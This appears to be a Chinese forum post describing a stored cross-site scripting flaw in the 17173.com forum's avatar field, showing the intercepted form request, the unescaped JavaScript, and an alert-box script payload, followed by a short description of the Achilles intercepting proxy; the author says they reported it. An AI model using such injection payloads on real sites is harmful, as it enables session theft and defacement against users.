学校地址:湖南省 长沙市 雨花区 车站南路红花坡路口 |
学校地址:湖南省 长沙市 雨花区 车站南路红花坡路口 |
WWW.17173.COM作为中国第一的游戏中心, 近正在进行论坛更换,由于没有完全制作完成就公布,遗留了不少漏洞,以下是我对头像系统的研究:
头像系统不允许用户直接更改头像的地址,但是我们可以抓
抓下来的东西如下
代码
face=XXX.GIF&realname=wahahame&sex=1&yyyy=1985&mm=7&dd=1&province=19&city=379&Submit=%C8%B7%A1%A1%B6%A8&Work=saveMdy
测试发现通过更改face可以更改头像,但好象也仅能做到这一步?
我们还能做更多吗?
保存一个发帖页,关于图象显示的JS代码如下
代码
strHTML+="<td width='20%' align='center' height='23' valign=top><a href='/show_userinfo.php?user="+oTip.owner+"' target='_blank'><b>"+oTip.nickname+"</b><br>";
strHTML+="<img src='http://my.17173.com/face/"+oTip.face+"' border=0></a><br><br>";
strHTML+="<table width= border=0 cellspacing=0 cellpadding=0 height=64>";
很显然没做处理.如果我们把头像地址改为:XXX.GIF'><script>alert("无用君向大家问好");</script>会怎么样呢
测试证明,脚本成功运行了.......
上报技术客服
收手,没再进一步破坏了.
achilles是一个代理软件。你可以在本地开一个代理
然后把IE指向他
这个代理与其他代理软件不同的是,你可以在发送请求和受到请求的时候把数据拦截下来
并且可以修改它,然后考虑是否发送它
对于分析一个网站:我到底提交了什么信息;我收到的COOKIE是什么;并且修改他们很是方便
不用请Iris这样的大部头,或者NC这样可操作性不强的东西了。
|